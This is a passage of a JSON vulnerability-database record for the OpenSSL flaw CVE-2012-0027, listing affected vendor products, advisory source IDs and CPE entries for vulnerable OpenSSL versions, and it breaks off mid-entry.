"service delivery manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.2" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip ltm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "docucolor dc242", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "project openssl 1.0.0c", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "big-ip apm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "tivoli workload scheduler distributed fp03", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.0" }, { "model": "linux enterprise server sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "20500" }, { "model": "iq", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.10" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.13" }, { "model": "aura sip enablement services sp4", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "enterprise linux", "scope": "eq", "trust": 0.3, "vendor": "oracle", "version": "6" }, { "model": "big-ip wom hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "reflection for ibm", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20080" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura communication manager utility services", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2.5.0.15" }, { "model": "project openssl d", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.2.1" }, { "model": "7.4-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.9" }, { "model": "tivoli netcool/system service monitor fp4", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0" }, { "model": "linux mandrake", "scope": "eq", "trust": 0.3, "vendor": "mandriva", "version": "2011" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.00" }, { "model": "linux lts lpia", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "project openssl 1.0.0b", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "big-ip analytics hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "57100" }, { "model": "big-ip webaccelerator hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.0" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "enterprise linux as", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "4" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.3" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "pfsense", "scope": "eq", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0" }, { "model": "tivoli netcool/system service monitor fp9", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "tivoli workload scheduler distributed fp07", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.4" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.8.3" }, { "model": "aura system manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "aura communication manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "hp-ux b.11.31", "scope": null, "trust": 0.3, "vendor": "hp", "version": null }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.2" }, { "model": "sterling connect:direct", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.5" }, { "model": "linux s/390", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip asm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "aura experience portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.1" }, { "model": "messaging storage server sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "project openssl f", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "tivoli netcool/system service monitor fp5", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "mac os", "scope": "ne", "trust": 0.3, "vendor": "apple", "version": "x10.8.4" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.3" }, { "model": "tivoli workload scheduler for applications fp01", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura session manager sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "sterling connect:direct for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.1" }, { "model": "tivoli workload scheduler distributed fp02", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.6" }, { "model": "ds8870", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.1.2" }, { "model": "linux i386", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.10" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "6.2" }, { "model": "big-ip apm hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "aura session manager sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip analytics hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-11411.1.1" }, { "model": "reflection sp1", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.1" }, { "model": "big-ip psm hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "big-ip asm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "enterprise linux server optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "aura application server sip core pb26", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "sterling connect:direct", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.6" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.2" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5" }, { "model": "system management homepage", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.0" }, { "model": "big-ip webaccelerator hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "xiv storage system gen3 mtm 11.1.0.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-114" }, { "model": "9.0-stable", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "vios", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.0" }, { "model": "linux lts amd64", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.6.8" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2810-11411" }, { "model": "sterling connect:direct", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "3.61" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "linux lts powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "8.04" }, { "model": "enterprise virtualization hypervisor for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "60" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "linux enterprise sdk sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip apm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "56002" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "76000" }, { "model": "voice portal", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1.1" }, { "model": "aura experience portal sp1", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "tivoli netcool/system service monitor fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "arx", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "6.1" }, { "model": "junos space r1.8", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "13.1" }, { "model": "big-ip analytics hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "informix genero", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2.40" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0.00" }, { "model": "aura messaging", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip asm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip ltm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl e", "scope": "eq", "trust": 0.3, "vendor": "openssl", "version": "0.9.8" }, { "model": "aura system platform sp3", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip analytics hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "linux enterprise desktop sp1", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "11" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "aura sip enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1" }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "enterprise manager", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "2.3" }, { "model": "reflection for unix and openvms", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "20080" }, { "model": "sterling connect:direct for microsoft windows", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.6.0" }, { "model": "enterprise virtualization hypervisor for rhel", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "50" }, { "model": "aura system manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "big-ip psm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "tivoli netcool/system service monitor fp1", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "tivoli network manager fp3", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.9" }, { "model": "jboss enterprise web server for windows", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "1.0.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "sterling connect:express for unix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.5.0" }, { "model": "big-ip ltm hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "tivoli netcool/system service monitor fp7", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.0.0" }, { "model": "9.0-release", "scope": null, "trust": 0.3, "vendor": "freebsd", "version": null }, { "model": "big-ip apm hf2", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.0" }, { "model": "big-ip wom hf1", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.1" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "7.4" }, { "model": "enterprise linux desktop optional", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77100" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "hardware management console 7r7.1.0", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "xiv storage system gen3 mtm 11.0.1.a", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-114" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.3.0" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "10500" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "ip office application server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "linux", "scope": null, "trust": 0.3, "vendor": "gentoo", "version": null }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "10.04" }, { "model": "big-ip analytics hf7", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "enterprise linux hpc node", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "6" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2" }, { "model": "smart analytics system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "77000" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "message networking", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.4" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "aura system platform", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0.1" }, { "model": "big-ip pem", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "ip deskphone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "96x16.3" }, { "model": "reflection", "scope": "eq", "trust": 0.3, "vendor": "attachmate", "version": "14.0" }, { "model": "enterprise linux server", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "aix", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.1" }, { "model": "mac os server", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.7.5" }, { "model": "aura session manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.0" }, { "model": "linux ia-32", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "tivoli composite application manager for transactions", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.2.0.2" }, { "model": "linux arm", "scope": "eq", "trust": 0.3, "vendor": "ubuntu", "version": "11.04" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "3.2" }, { "model": "big-ip psm hf5", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "tivoli workload scheduler distributed fp04", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "8.5.1" }, { "model": "communication server 1000e signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.0" }, { "model": "enterprise linux desktop workstation client", "scope": "eq", "trust": 0.3, "vendor": "redhat", "version": "5" }, { "model": "docucolor dc252", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "0" }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "4.0.1" }, { "model": "aura application enablement services", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "tivoli netcool/omnibus", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.4" }, { "model": "ds8870", "scope": "ne", "trust": 0.3, "vendor": "ibm", "version": "7.2" }, { "model": "linux enterprise desktop sp4", "scope": "eq", "trust": 0.3, "vendor": "suse", "version": "10" }, { "model": "big-ip pem hf4", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "linux powerpc", "scope": "eq", "trust": 0.3, "vendor": "debian", "version": "6.0" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "aura conferencing standard", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "security network intrusion prevention system", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "4.2" }, { "model": "esxi", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "4.0" }, { "model": "hardware management console 7r7.2.0 sp1", "scope": null, "trust": 0.3, "vendor": "ibm", "version": null }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "freebsd", "scope": "eq", "trust": 0.3, "vendor": "freebsd", "version": "8.2" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "pfsense", "scope": "eq", "trust": 0.3, "vendor": "bsdperimeter", "version": "2.0.1" }, { "model": "messaging storage server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2.2" }, { "model": "message networking", "scope": "ne", "trust": 0.3, "vendor": "avaya", "version": "5.2.5" }, { "model": "aura application server sip core", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.1" }, { "model": "system management homepage", "scope": "ne", "trust": 0.3, "vendor": "hp", "version": "7.1.1" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "big-ip psm hf3", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "big-ip psm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1" }, { "model": "messaging storage server sp2", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "project openssl 1.0.0a", "scope": null, "trust": 0.3, "vendor": "openssl", "version": null }, { "model": "xiv storage system gen3 mtm", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "2812-11411" } ], "sources": [ { "db": "CERT/CC", "id": "VU#737740" }, { "db": "BID", "id": "51281" }, { "db": "JVNDB", "id": "JVNDB-2012-001022" }, { "db": "NVD", "id": "CVE-2012-0027" }, { "db": "CNNVD", "id": "CNNVD-201201-062" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "children": [], "cpe_match": [ { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta4:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta3:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8n:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8s:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8p:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8c:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7i:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7h:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.5:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.4:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0:beta5:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8r:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8g:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8m:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8b:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.8d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7f:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.7e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6l:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6k:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6e:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.6d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.3a:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:0.9.3:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:*:*:*:*:*:*:*:*", "cpe_name": [], "versionEndIncluding": "1.0.0e", "vulnerable": true }, { "cpe23Uri": "cpe:2.3:a:openssl:openssl:1.0.0d:*:*:*:*:*:*:*", "cpe_name": [], "vulnerable": true }, { "cpe23Uri": 